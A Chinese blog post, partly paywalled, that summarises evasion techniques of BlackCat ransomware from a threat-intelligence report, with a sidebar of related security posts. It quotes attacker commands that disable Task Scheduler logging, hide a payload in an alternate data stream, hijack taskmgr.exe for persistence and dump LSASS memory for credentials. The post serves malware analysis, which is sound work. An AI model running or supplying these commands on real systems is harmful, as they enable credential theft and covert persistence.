恶意软件免杀与技术(2022.03.18)

已于 2022-03-21 11:18:17 修改
阅读量364 收藏
点赞数 1
分类专栏: Windows病毒分析 文章标签: windows
于 2022-03-18 16:35:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43312649/article/details/123578694
版权
本文探讨了三款恶意软件——BlackCat勒索软件,通过禁用日志、隐藏ADS流和镜像劫持等方式进行免杀;SBIDIOT IoT恶意软件,通过连接默认网关验证互联网访问并防止常规UPX脱壳;以及LokiLocker勒索软件,利用KoiVM虚拟化技术混淆代码,并执行多种命令清除系统备份。这些恶意软件展示了攻击者的复杂手段和免杀策略。
摘要由CSDN通过智能技术生成

BlackCat勒索

链接:https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html
在设置反向 ssh 计划任务工具之前,攻击者禁用了任务计划程序的日志
c:\windows\system32\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false
C++实现了写入 C:\目录的alternate data stream (ADS)流隐藏
c:\windows\system32\windowspowershell\v1.0\powershell.exe -command & {(get-content c:\system -raw | set-content c:\ -stream ‘cachetask’)}
利用镜像劫持做自启动项
c:\windows\system32\reg.exe add hklm\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe /v debugger /t reg_sz /d c:\system
直接使用系统的comsvc​​s.dll 转储 LSASS 内存
powershell rundll32.exe c:\windows\system32\comsvc​​s.dll, minidump

了解本专栏 订阅专栏 解锁全文 超级会员免费看
摔不死的笨鸟
关注
专栏目录
订阅专栏
恶意软件免杀技术(2022.03.25)
摔不死的笨鸟的博客
04-01 463
LockBit LOCKBIT检查进程控制块 (PEB)中的NtGlobalFlag字段,以检测是否正在调试恶意软件进程 使用FNV1A对每个名称(小写)进行哈希处理并与硬编码哈希进行比较,然后返回相应的 DLL 库 LockBit尝试通过修改自己的访问控制列表来限制对自己进程的访问 限制进程访问 调用GetSecurityInfo来检索进程的安全描述符 ACL 调用RtlAllocateAndInitializeSid为EVERYONE 组分配和初始化具有SECURITY_WORLD_SID_AUTHOR
恶意软件免杀技术(2022.04.25)
摔不死的笨鸟的博客
04-25 3732
BlackGuard加密货币钱包窃取 规避以下dll的加载 SbieDll.dll 沙盒沙盒 SxIn.dll 360全方位安全 Sf2.dll Avast 杀毒软件 snxhk.dll Avast 杀毒软件 cmdvrt32.dll COMODO 网络安全 使用Obfuscar进行.NET程序混淆 BlackGuard 还将查询“IP-Whois”以确定受害者的大致位置。在 BlackGuard 的一些样本中,此功能用于防止恶意软件在特定的东欧国家执行。 通过Chrome插件ID找到加密钱包的插件路径,然
恶意软件免杀技术(2022.10.08)
摔不死的笨鸟的博客
10-08 1263
恶意软件新动态
恶意软件免杀技术(2022.05.05)
摔不死的笨鸟的博客
05-05 866
APT37攻击朝鲜记者 Fantasy会注入被XOR加密的payload,在数据结构中定义加密的XOR密钥,payload大小,加密的数据内容。 最终stage-GOLD-BACKDOOR和2021年8月Volexity披露的bluelight几乎吻合。 D:\Development\GOLD-BACKDOOR\Release\FirstBackdoor.pdb E:\Development\BACKDOOR\ncov\Release\bluelight.pdb GNU字符串工具可以看到嵌入在word中的l
Win7系统提示找不到reg.exe文件的解决办法
最新发布
file
03-10 907
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个reg.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现reg.exe丢失要怎么解决?
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1253
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
恶意代码--杀毒软件查杀的对抗技巧分享
关注互联网安全的小虾米一枚
03-16 6779
0x01 静态查杀 静态特征码查杀概念 恶意代码--杀毒软件查杀的对抗技巧分享
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1254
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
error PRJ0003 : 生成“C:\WINDOWS\system32\cmd.exe”时出错
无知人生,记录点滴
10-18 703
最近使用visual studio 2005或visual studio 2008的编译项目时可能都遇到了这样的问题: error PRJ0003 : 生成“C:\WINDOWS\system32\cmd.exe”时出错 1>Project : error PRJ0003 : Error spawning 'C:\Windows\System32\cmd.exe'. 1>Bu...
终端进程启动失败: shell 可执行文件“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”的路径不存在。亲测真实有用
热门推荐
qq_44430410的博客
02-12 1万+
vsCode打开终端进程启动失败 终端进程启动失败: shell 可执行文件“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”的路径不存在。 因为某些原因重新安装1了vscode 和node 遇到了两个棘手的问题 ctrl + ~ 打开终端提示 “终端进程启动失败: shell 可执行文件“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”的路径...
对亮神基于白名单Rundll32.exe执行payload第十一季复现
cxk
05-06 505
待补充…
Windows中使用reg命令编辑注册表
刚毅的博客
12-25 4947
最近在做灾备项目中,需要对一台Window服务器上的注册表,修改键值,这里记录修改的方法。 1 reg命令 reg命令是Windows系统命令,位于c:\windows\system32\目录下面,是系统修改注册表的一个工具。   在Windows的CMD窗口中,在C:\Windows\system32目录, 输入reg /?也可查看命令的用法:   下面演示添加注册表的添加、修...
关于metasploit的木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2374
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
远控免杀从入门到实践之白名单(113个)总结篇
weixin_46236101的博客
03-13 2451
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实践
免杀新姿势:利用线程将恶意代码注入到内存中
weixin_33754913的博客
09-18 605
本文讲的是免杀新姿势:利用线程将恶意代码注入到内存中, 产生存放远程攻击线程的进程 在这篇文章中我不想一步一步解释我编写的C#代码,但是我会展示下它能够绕过杀毒软件,并且操作非常简单,而且实用。 首先说明一下: 1.我是在三年前发现这个攻击方法的,当我在做免杀的时候我发现了很多都是以0x0地址开始的进程。在我的win7系统中这种恶意代码绕过了我的杀毒...
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1633
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
关于免杀
u012411894的博客
11-15 918
虽然目前有很多方法可以让恶意软件使用某一技术绕过反病毒检测,但这些显然不是恶意软件免杀的终极目标, 它们的最终目标是实现 “FUD”, “FUD” 是地下网络论坛的黑话,代表“恶意软件完全不可被检测到”的意思。 免杀主要有三种方法:静态免杀,动态免杀和启发式免杀。 一般杀软检测方式: 1.基于签名的检测 2.静态程序分析 3.动态程序分析 4.沙盒分析技术 5.启发式分析 6.信息熵检测 ...
Metasploit生成免杀恶意程序
maoyeyedezhihui的博客
05-09 1474
1.注意事项 以下渗透测试坏境需要windows xp sp3,之前用的sp2,程序执行时一直报错提示找不到kernel.dll,其实是sp2系统不支持,是系统自身的问题。 2.生成独立运行的二进制文件 在演示免杀技术之前,先用MSF攻击载荷生成器(msfvenom)创建一个可独立运行的Metasploit载荷程序。在此,选择创建一个反弹shell程序,它能够回连到攻击机,并弹出一个命令行shel...
Xilinx Vitis 2019.2:统一软件平台加速嵌入式与加速应用开发
"Xilinx Vitis (Vivado) 2019.2 是一个统一的软件开发平台,旨在帮助开发者在Xilinx的异构硬件平台上,如FPGA、SoC和Versal自适应计算加速平台(ACAP),进行嵌入式软件和加速应用的高效开发。这个平台为边缘计算、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

摔不死的笨鸟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值